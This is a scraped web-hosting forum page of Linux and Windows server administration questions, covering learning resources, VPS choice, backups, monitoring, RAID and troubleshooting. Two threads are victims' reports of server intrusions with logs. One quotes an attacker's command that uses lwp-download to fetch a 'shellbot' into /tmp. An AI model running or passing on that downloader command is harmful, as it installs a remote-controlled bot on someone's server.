Learning Linux System Administration
Where would someone go to learn Linux System Administration?
Are the Redhat courses worthwhile?
View Complete Thread with Replies
Sponsored Links:
Related Forum Messages:
Linux: Remote Administration
I'm thinking about putting a server in a colo where the Datacenter is a 4 hour drive. My question is: "Do Linux machines running LAMP hang / freeze often so that you cannot force a reboot remotely ?" - "Does it even happen on Linux boxes?" I have a lot of experience with Windows machines but none with Linux. With a Windows machine I for sure would have to purchase a DRAC/LILO board. Unfortunately, I don't have any production experience with Linux so I don't know the risk of having to go on site because Linux decided to completely freeze making remote management impossible. Of course this is not included any hardware outages.
View Replies!
View Related
Linux System
I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background? Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc. how to download tar file using Terminal,
View Replies!
View Related
Determining Operating System (Linux)
Without having all of the operating systems at my disposal for testing, I would like to figure out a way to determine the operating system of a remotely accessed Linux machine. It seems pretty strange though, since cPanel reports both machines I am using as being CENTOS Enterprise 4.5 i686, yet one's uname -a reports: Code: Linux hostsentry.crucialwebhost.com 2.6.9-023stab044.4-enterprise #1 SMP Thu May 24 17:41:23 MSD 2007 i686 i686 i386 GNU/Linux Code: Linux main.7kb.org 2.6.9-55.0.6.ELsmp #1 SMP Tue Sep 4 21:36:00 EDT 2007 i686 i686 i386 GNU/Linux I'm assuming there is a way to determine the OS from this information. Anyone know how?
View Replies!
View Related
VPS Learning Curve
I am a Windows user. I have very little experience with Linux. But I am technically savvy. I am thinking about a VPS hosting solution for 4 blogs that I am going to be hosting, and also a company website. The Linux VPS plans seem much more affordable than the Windows plans. Is it hard to learn to administer and maintain your Linux VPS? What is the learning curve like? Or should I stick with Windows and just pay the premium? Or, if I am just starting out, and have little to no traffic to speak of right now, should I go with shared hosting instead (the reason I wanted to start out with VPS hosting is that I have heard it is hard to move from shared to VPS once you have already been established; also I am confident in the future traffic to my sites as well and might as well plan ahead of time)?
View Replies!
View Related
Unmanaged Vps For Learning Purposes
how to setup OS on vps and how to use SSH. I cannot install other OS on my local machine which is running vista. So i think the best way for me is to buy a cheap vps which i can use for my experiments and learning purposes. Am i thinking correctly ? If yes then please direct me to the best offer for my case, or help me to find it. by the end i hope i will be able to setup vps, use SSH professionally.
View Replies!
View Related
New To Backup Management - Learning The Basics
Up until now I have not managed a site that needed backups, but that is about to change. I have a lot of questions, and they are newbie questions. Hope there's some patient people who have time to respond to some of them. If there are tutorials or articles you can recommend that would bring me up to speed, that would be most welcome too. The project has 1 domain with about 100 subdomains. Each subdomain will have its own CMS and MySQL database. All will initially exist on one shared server (HostGator reseller account), but will likely be moving to a dedicated or managed server shortly. Ideally, I would like to have the hosting company manage the backups automatically. I saw a managed server package from webmasters.com that includes automated nightly backup. I am wondering that, if lets just say only 5 of the subdomains had an issue - would I be able to restore just those 5 - or would I have to bring all 100 subdomains back to the restore point? I am also looking at other options, that I can implement before we move to a managed server. Those options include: 1) Use CPanel to create a backup on a daily or weekly basis. I think, if memory serves me, that creating a backup of the domain, would include all the subdomains and databases. But - like my earlier question - I think that I would have to bring all 100 subdomains to the restore point if there was even 1 problem. 2) Use an FTP program to create a backup on a daily or weekly basis. I suppose the only investment for that would be my time, and an external hard drive. This solution would allow me to isolate certain subdomains. My question here is - in what file/folder are the MySQL databases stored (its not obvious to me.) 3) Move to a host that provides nightly backups even for their shared servers...
View Replies!
View Related
Resources For Learning Server Management
if there were any free resources out there that anyone know's of that could teach someone how to manage an unmanaged dedicated server? General guides will do but the more specific the better although I really cannot imagine a guide specific to my requirements but anyway Quote: Fedora core 6 with WHM and Cpanel Where do people learn this stuff without having to take a course in it?
View Replies!
View Related
Linux System Compromised, Hacker In As "root"
I've been trying to fight off a hacker's attack for the past 24 hours. Chronologically, this is how the events evolved: - Yesterday, I tried SSH-ing into my server as usual and I got an error saying that the host's key was not recognized, which made a bit suspicious - I tried logging into my VPS' PowerPanel, but my root password did not work, which I found disturbing. I reached out to support and they reset the password - I ignored Putty's warning and SSH-ed into the server and was greeted by this, which I've never seen before: Code: Last login: Wed Mar 14 2007 14:13:35 -0500 No mail. This made even more conscious and I started actively searching for indicators of a breach. - The following processes were running, and I did not recognize them: Code: named 15756 0.0 0.4 36088 2256 ? S Mar14 0:00 /usr/sbin/named -u named -t /var/named/chroot dmorg 26360 0.0 0.1 2264 872 pts/2 T 20:40 0:00 sh -c (cd /usr/share/man && (echo ".ll 14.2i"; echo ".pl 1100i"; /usr/bin/gunzip -c '/usr/share dmorg 26361 0.0 0.1 2264 512 pts/2 T 20:40 0:00 sh -c (cd /usr/share/man && (echo ".ll 14.2i"; echo ".pl 1100i"; /usr/bin/gunzip -c '/usr/share - Then I found a user called 'pma' in the /home directory, which I had never created. I could not find any suspicious files in the user's directory - I finally spotted the point of breach in /var/log/messages: Code: Mar 15 15:05:25 xxxxxxxxx passwd(pam_unix)[28121]: password changed for root Mar 15 15:06:34 xxxxxxxxx su(pam_unix)[30182]: session opened for user news by (uid=0) Mar 15 15:07:16 xxxxxxxxx su(pam_unix)[30182]: session closed for user news Mar 15 15:22:04 xxxxxxxxx sshd[20118]: Listener created on port 22. Mar 15 15:22:04 xxxxxxxxx sshd[20119]: Daemon is running. Mar 15 15:28:01 xxxxxxxxx su(pam_unix)[32568]: session opened for user pma by (uid=0) Mar 15 15:28:45 xxxxxxxxx su(pam_unix)[32568]: session closed for user pma Somehow they had gotten in as root and then opened sessions for news and pma. - This morning I finally found where the hacker's files are hiding. He had created a new user overnight and a directory in there called "...". The folder contains various files: Code: [root@xxxxxxxxx root]# ls -al total 445 drwxr-x--- 8 root root 1024 Mar 16 15:48 . drwxr-xr-x 20 root root 1024 Mar 16 15:48 .. drwxr-xr-x 2 1004 1004 1024 Dec 17 08:57 ... -rw-r--r-- 1 root root 1126 Aug 23 1995 .Xresources -rw------- 1 root root 14641 Mar 16 15:47 .bash_history -rw-r--r-- 1 root root 24 Jun 10 2000 .bash_logout -rw-r--r-- 1 root root 234 Jul 5 2001 .bash_profile -rw-r--r-- 1 root root 176 Aug 23 1995 .bashrc -rw-r--r-- 1 root root 210 Jun 10 2000 .cshrc -rw------- 1 root root 38 Jul 26 2005 .mysql_history drwx------ 2 root root 1024 Mar 15 18:01 .ssh drwxr-xr-x 2 root root 1024 Mar 15 15:21 .ssh2 -rw-r--r-- 1 root root 196 Jul 11 2000 .tcshrc Code: [root@xxxxxxxxx root]# cd "..." [root@xxxxxxxxx ...]# ls -al total 420 drwxr-xr-x 2 1004 1004 1024 Dec 17 08:57 . drwxr-x--- 8 root root 1024 Mar 16 15:48 .. -rwxr-xr-x 1 1004 1004 141817 Sep 3 2001 init -rw-r--r-- 1 1004 1004 113482 Mar 15 15:09 log -rw------- 1 1004 1004 640 Feb 18 05:34 messages -rw-r--r-- 1 1004 1004 664 Feb 27 01:12 muhrc -rwxr-xr-x 1 1004 1004 165596 Nov 2 2004 pico -rw------- 1 1004 1004 5 Mar 15 15:09 pid [root@xxxxxxxxx ...]# - Here's what's in the log file: Code: [root@xxxxxxxxx ...]# less log [Thu 08 May 08:03:27] + ---------- NEW SESSION ---------- [Thu 08 May 08:03:27] + muh version 2.05d - starting log... [Thu 08 May 08:03:27] + listening on port 6667. [Thu 08 May 08:03:27] + muh's nick is 'StefanG'. [Thu 08 May 08:03:27] + trying server 'geneva.ch.eu.undernet.org' on port 6667... [Thu 08 May 08:03:28] + tcp-connection to 'geneva.ch.eu.undernet.org' established! [Thu 08 May 08:03:29] + connected to 'Geneva.CH.EU.Undernet.org'. [Thu 08 May 08:03:30] + caught client from 'pcp02588223pcs.shlb1201.mi.comcast.net'. [Thu 08 May 08:03:45] + authorization successful! [Thu 08 May 08:03:45] + reintroducing channels... [Thu 08 May 08:07:54] + ---------- NEW SESSION ---------- [Thu 08 May 08:07:54] + muh version 2.05d - starting log... [Thu 08 May 08:07:54] + listening on port 6667. [Thu 08 May 08:07:54] + muh's nick is 'StefanG'. [Thu 08 May 08:07:54] + trying server 'eu.undernet.org' on port 6667... [Thu 08 May 08:07:55] + tcp-connection to 'eu.undernet.org' established! [Thu 08 May 08:08:05] + connected to 'Diemen.NL.EU.Undernet.org'. [Thu 08 May 08:08:05] + caught client from 'pcp02588223pcs.shlb1201.mi.comcast.net'. [Thu 08 May 08:08:05] + authorization successful! [Thu 08 May 08:08:05] + reintroducing channels... There is a whole lot of these in that log file, and the timestamps look odd. I am not sure what all this is. - This is where I am at right now. Can you guys help figure this thing out? How did they get in? What sort of vulnerability are they using? How can I patch things up? - Here is my server info: Code: [root@xxxxxxxxx ...]# uname -a Linux xxxxxxxxx.org 2.6.9-023stab033.9-enterprise #1 SMP Tue Dec 5 14:40:57 MSK 2006 i686 athlon i386 GNU/Linux [root@xxxxxxxxx httpd]# vmstat 5 5 procs -----------memory---------- ---swap-- -----io---- --system-- ----cpu---- r b swpd free buff cache si so bi bo in cs us sy id wa 1 0 0 390688 0 0 0 0 0 0 0 8365 1 0 99 0 0 0 0 390524 0 0 0 0 0 0 0 0 0 0 100 0 0 0 0 390524 0 0 0 0 0 0 0 0 0 0 100 0 0 0 0 390528 0 0 0 0 0 0 0 0 0 0 100 0 0 0 0 390528 0 0 0 0 0 0 0 0 0 0 100 0 - I have Apache & MySQL & PHP running. I host 3 websites. They run Simple Machines Forum 1.1.2, phpMyAdmin, phpcollab, awstats and that's about it.
View Replies!
View Related
Server Administration Courses
I would like to hone my Linux administration skills. Are there any good courses out there that stand above the rest in terms of online training? I know some very basic stuff when it comes to the Linux architecture and how to perform basic tasks via SSH, but would like to learn more so that I am more comfortable performing more complex tasks.
View Replies!
View Related
Windows Server Administration
This probably belongs in another catagory but I like to get feedback from the colo crowd. I'm looking for someone to do the initial server setup on a Windows Server 2003 box. I would like to install HELM and Coldfusion. Is there anyone that can recommend a good company or freelancer to do this?
View Replies!
View Related
Google Apps Administration And Integration
Our company uses Google Apps for Domain (and we are very satisfied with it). Until recently, we were accessing our email via[url], but we then realized that it can be accessible via [url]by updating CNAME and MX records for our DNS zone. We have full access to WHM and cPanel. However, what we are trying to accomplish, if possible, that, when someone types [url], it does NOT redirect him/her to [url], but it remains on that very domain. For example, the address for GMail inbox in that case would be [url]
View Replies!
View Related
Is Colocation With Administration Of Services A Reality
I have a high level server that is in need of a place to live and also an administrator to handle backups, patches, and also to work with the software manufacturer to acheive different configurations. I am not asking for names, but rather I need to know if there are services out there that are willing to do this. (Does this exist?) I am having terrible luck with my existing host as their willingness to touch the server, even with no liability, has faded.
View Replies!
View Related
General Windows Administration Info
I'm getting a dedicated Windows server for my business web site (a classifieds service similar to AutoTrader, with e-commerce capabilities). I need to get someone for routine administration, but I don't know the first thing about it. What are the general tasks that need to be done on a regular basis with a Windows host server? How many hours per week can I expect a professional admin to spend on these tasks? Starting out, the traffic will be on the low end, but I'm expecting 100,000+ users within a few months.
View Replies!
View Related
Review Of Services: Mike Bailey / Mikey / Ub3r - Server Support / Administration
I've been a member of WHT for more than five years now, and while I skim WHT daily, I rarely start new threads. My recent experience with Mike Bailey (aka ub3r) deserving of a review, and I hope that others find it informative and useful. I only know Mike(y) through WHT, and over the years have had an opportunity to read his posts. I've previously contacted him asking for assistance with web design, but he remained humble and pointed me in another direction, with the explanation that my needs could be better met by a more experienced web designer (I'm not sure I agree). For the past six months I've had a problem interpreting and responding to a support message by one of my VPS providers. I would imagine that the problem and solution were a relatively easy fix, but I needed someone to take the time to help me step-by-step. After contacting Mikey, he followed up with me immediately, and before quoting a price made sure he understood the scope of the problem. Mike not only emailed me step-by-step instructions on fixing the problem, but he actually took time to explain how it worked. As a teacher I must say that he did a great job explaining the topic in a clear manner, and his willingness to answer follow up questions was very helpful. The truth is I'm sure he's dealt with far more difficult server issues, but his level of professionalism and willingness to help were evident throughout this entire process. The value of services he provides, and his willingness to not only fix the problem, but also explain the steps, demonstrates his commitment to providing great customer service.
View Replies!
View Related
Slow System
Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail. Anytime I restart Apache, it loads quick for a few seconds then gets slow again... Here are the top few processes listed on the process manager: .....
View Replies!
View Related
KVM Over IP System
I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare. I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work. So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?
View Replies!
View Related
System Cleaning
Is there anything like System cleaning in VPS (Linux with apache) ? I need to do system cleaning so that my space and performance can increase. Is there anything like that in Linux?
View Replies!
View Related
System Warning
Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition. Quote: Event Type:Warning Event Source:LSASRV Event Category:SPNEGO (Negotiator) Event ID:40960 Date:3/20/2007 Time:7:45:33 PM User:N/A Computer:B02S08MR Description: The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request. (0xc000005e)". For more information, see Help and Support Center at [url] Data: 0000: 5e 00 00 c0
View Replies!
View Related
System Logs
I keep receiving hacking attempts from someone accessing my server and running commands like these: Code: hubberfix sh -c cd /tmp;lwp-download [url] shellbot I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this. Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.
View Replies!
View Related
Which Operating System
There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron. CentOS Debian Direct Admin Fedora FreeBSD Gentoo LiveCD Redhat Slackware
View Replies!
View Related
Whole System Backup
I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc. I dont want to see that some day something crash - and I will must start over with everything. What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc. I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.
View Replies!
View Related
System Clock Off Continuously
One of our server's system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off. Any ideas what could be causing this? It's uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running. Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.
View Replies!
View Related
Perl System Mail
I am trying to write a perl script, it send's mail to a user i used system(mail -s test) and also send some messages using this. but my issue is i receive mail with html code like <br> and so.. how to get a plain mail using this system command.
View Replies!
View Related
Server Became Read Only System
I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.) Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system. I cann't even reboot system Quote: [root@server sa]# reboot reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2) such few commands work, the most commands that i know don't work Quote: [root@server ~]# ls -la ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory
View Replies!
View Related
HostMonster.com System Loads
I have a shared host with them for a few months which the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours? Server Load 2.92 (8 cpus) Memory Used 42.6 % Swap Used 0.01 % Disk /dev/sdc1 (/home) 91 % Disk /dev/sdd1 (/backup) 90 % Disk /dev/sde1 (/backup/cpbackup/weekly) 43 % Disk /dev/ram0 (/ramdisk) 24 % Disk /dev/sdb1 (/) 22 %
View Replies!
View Related
System Health Monitoring
I am wondering if anyone knows of any good system monitors for Linux. I will be installing several web and database servers at a branch office and would like to receive stats like system temperature, cpu load, memory usage, etc. Basically something to tell to warn me in the event of a hardware error. I am looking something with an easy-to-use web interface and ability to generate reports.
View Replies!
View Related
VZPP - System Usage
I have a VPS with 512mb guaranteed memory. From VZPP, my Resource Capacity(System Usage)is using >50% even when I don't have any active sites at all! Support staff trying to convince me is normal as apache, cpanel etc are using resources. Yes, I agreed they use up resources. But at >50%? What will happen if I just have an active site, wouldn't it hit 100% and I have to upgrade immediately for more resources? I think is more of nodes or some setup issues then "is normal". What is normal "system usage" for new VPS with no website on it.
View Replies!
View Related
Apache Hogs The System
Getting the following in my log Quote: apache 1994 0.0 0.0 2776 1020 ? S 15:02 0:00 sh -c /usr/bin/identify -format %w###%h###%m###%n###%r###%z "/tmp/php apache 1995 23.3 0.0 0 0 ? D 15:02 1:03 [identify] This is a good case.. normally though it is like this: Quote: apache 2864 0.0 0.0 3064 1020 ? S 15:08 0:00 sh -c /usr/bin/identify -format %w###%h###%m###%n###%r###%z "/tmp/php apache 2865 39.8 0.3 19944 12612 ? D 15:08 0:26 /usr/bin/identify -format %w###%h###%m###%n###%r###%z /tmp/php0SNeMT
View Replies!
View Related
Central Monitoring System
i have some server at a data center but it dont provide any remote reboot port and any BW monitoring and etc.. i have to run my own monitoring system,and i need a bit more info for this. which software is required for this and which hardware base i need?
View Replies!
View Related
Allocate System Ram
I have a VPS acct with Plesk, am peaking out my system ram at 128mb. Host said to allocate ,ore = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (non that are too big). Most of them are wordpress sites. Would caching help? Not sure where to look to find this out.
View Replies!
View Related
Phone System Checking
I'm thinking to implement a solution for our VOIP system so that automatic calls should be done several times a day and to check that someone is responding or that it's ringing. We are using AsteriskWin32 for now and for our needs it's working great.
View Replies!
View Related
Changing System Date
We have a server located in USA. We have hosted an application for online booking of travel tickets. The customer wanted to change the system date to IST instead of EDT which we did. Now, if we try to change the system date to a future date in order to test our application, the date automatically resets to the current date. This happens only if we have the timezone as IST. If we change the system date to EDT, then after changing the system date, it does not reset automatically. It changes only if we modify it manually. However, if we change the timezone to IST, then the system date resets automatically back to the current date. We have stopped the W32 Time service and also blocked the port 123. We have also disabled the automatic synchronization with the internet time server.
View Replies!
View Related
Setting Up RAID System
I've never loaded Linux onto a RAID array before, I have an Adaptec 2105S card, with 3 x SCSI HDD's attached, in a RAID5 setup. When I boot the Cent OS Server 4.4 CD, it says I don't have any hard drives attached. I am then prompted to select a device driver, but it does not show up in the list. The options in the list are: - Adaptec AACRAID (aacraid) - Adaptec AHA-152x (aha152x) - Adaptec AHA-2740, 28xx, 29xx, 39xx (aic7xxx) - Adaptec Aic79xx SCSI Host Bus Adapter driver (aic79xx) - Adaptec SAS/SATA Host Bus Adapter driver (adp94xx) It says if I have a driver disk, hit F2. The problem is that I don't have a driver disk. The manual tells me to visit [url]for drivers, but it's not offline. When I go to the download section for the card [url]the only *nix option, is SuSE.
View Replies!
View Related
File System Check
i got this message from my provider after asking for a reboot: Quote: Your server had an EXT3 FS error scrolling across the screen. I rebooted and the server mounted clean, but you may end up needing a file system check (FSCK). I want to do that myself so i can schedule the downtime after midnight, what are the procedures to fix this erros to avoid the need to reboot the server often am using CENTOS with cpanel & whm
View Replies!
View Related
Hosting System Automation
I want to establish free web hosting site/service. Is there any system available that will automate all registrations and stuff? I'm looking for something like layeredpanel.. Maybe theres anything similar but open source?
View Replies!
View Related
Email System Signatures
I have a technical issue which I need to address, which is email signatures. Larger companies have email signatures which are posted by the server, and not the client. I was wondering if it was possible to put a signature on all emails which leave a particular domain using this method?
View Replies!
View Related
Switch For Clustering System
I am going to build a clustering system for a customer. It's around 15 servers running apache, mysql and mail. Wondering which switch do you recommend for that? I am using a HP Procurve 2524 for another smaller system, but customers face to slow performance *sometimes* For the feature, dont need much. Dont need routing feature (Layer3 switch?), just to connect all of them into a clustering system.
View Replies!
View Related
Which The Best Operational System For Vps?
which of these operational systems is the best one for one vps?CentOS 4 (32bit) CentOS 4 (64bit) CentOS 5 (32bit) Fedora Core 3 (32 bit) Fedora Core 4 (32 bit) Fedora Core 5 (32bit) Debian Sarge 3 (32bit) Gentoo 3 (32 bit) Opensuse 10 (32 bit) Suse 9 (64 bit) Ubuntu 6 (32bit) Windows 2003 Std
View Replies!
View Related
CentOS - My System Is Hacked
I'm running CentOS 4.4 and I want to know what utilities and procedures I need to follow to find out if my system is compromised (hacked). I dont see any symptoms right now but I want to be fully aware in case something happens.
View Replies!
View Related
System Integrity Monitor
I installed system integrity monitor problem It says: [05/29/07 21:35:15]: HTTP service is online. [05/29/07 21:35:15]: HTTP url request failed, assuming offline. [05/29/07 21:35:15]: HTTP offline, restart limit exceeded. How do i increase this so called restart limit? System integrity monitor on server.dealsreferals.com has taken action in responce to an event. Recent event logs are enclosed below for your inspection. There has been 23 events today, if an average of 1000 events is reached, e-mail alerts will be terminated for the duration of the day. - Events Summary: Total event count: 23 Average event count: 2 - Service Summary: FTP [online - 0 events] HTTP [offline - 11 events] DNS [online - 1 1 events] SSH [restarted - 1 events] MYSQL [restart failed - 1 events] XINET [restarted - 1 events] - System Summary: LOAD [25.71 - status good - 17 events] NETWORK [eth0 - online - 0 events] - SIM Log: [05/29/07 21:30:12]: XINET service is online. [05/29/07 21:35:15]: LOAD 25.71 (status good) [05/29/07 21:35:15]: NETWORK is online. [05/29/07 21:35:15]: FTP service is online. [05/29/07 21:35:15]: Error in http.chk, $LPATH_NT not found. [05/29/07 21:35:15]: HTTP service is online. [05/29/07 21:35:15]: HTTP url request failed, assuming offline. [05/29/07 21:35:15]: HTTP offline, restart limit exceeded. [05/29/07 21:35:15]: DNS service is online. [05/29/07 21:35:15]: SSH service is offline. [05/29/07 21:35:15]: Restarted SSH service (1 SSH events today). [05/29/07 21:35:15]: MYSQL service is offline. [05/29/07 21:35:15]: MYSQL restart failed, could not find /etc/init.d/mysqld. [05/29/07 21:35:15]: XINET service is offline. [05/29/07 21:35:15]: Restarted XINET service (1 XINET events today). - System Log: May 29 21:35:48 server smartd[2510]: smartd received signal 15: Terminated May 29 21:35:49 server smartd: smartd shutdown failed May 29 21:35:54 server xinetd[14167]: Exiting... May 29 21:35:54 server xinetd: xinetd shutdown succeeded May 29 21:35:54 server bandmin: Shutting down bandmin: May 29 21:36:01 server bandmin: [60G May 29 21:36:01 server bandmin: May 29 21:36:01 server rc: Stopping bandmin: succeeded May 29 21:36:05 server sshd: Stopping sshd failed May 29 21:36:06 server acpid: acpid shutdown succeeded May 29 21:36:07 server crond: crond shutdown succeeded May 29 21:36:07 server autofs: Stopping automount: May 29 21:36:08 server sshd: succeeded May 29 21:36:12 server xinetd: xinetd shutdown failed May 29 21:36:16 server xinetd: xinetd startup succeeded =============================================================================== SIM 2.5-3 <sim@r-fx.org> 05/29/07 21:35:15
View Replies!
View Related
Raid 5 On System Volume
Ive just bought a Power Edge 2600 and I decided to setup the three disks that came with it as raid 5 (within PERC) and installed Win2003 Std. Works great. But while browsing one of my MCSA books I read that using a raid 5 configuration on the system / boot volume it is next to useless as it offers no redundancy should a volume fail. (With respect to easily booting it back up should a volume fail) I'm going to use Raid 1 (again with PERC) across two other drives for my exchange data but I'm worried about my system volume. Is my MS book talking about the OS not been able to rebuild data should a volume fail or is this a general rule for raid 5 setups?
View Replies!
View Related
System Error 53 Samba
I was wondering if anyone has came across this error when dealing with SAMBA. [url]is the error and the 'fix'. I have about 50users that can connect just fine, running sp2 (xp pro) but some other users that have xp home or media center can't. There running sp2 and they still get the above error. In the article i need to contact MS for the hotfix... Any quick fixes other then maybe changing then workgroup? Netbios is enabled All can ping the server. Z drive is OK for use (IE there PC doesnt have a Z drive in use)
View Replies!
View Related
Inexpensive Quad System
What is the price one should expect to pay for a quad system server? I am guessing this could either be four cpus, two dual core cpus, or four seprate cpus all on the same motherboard. What this the best way to offer such a server? If you were on a budget and building a server, which motherboard/cpu combo would you go for?
View Replies!
View Related
|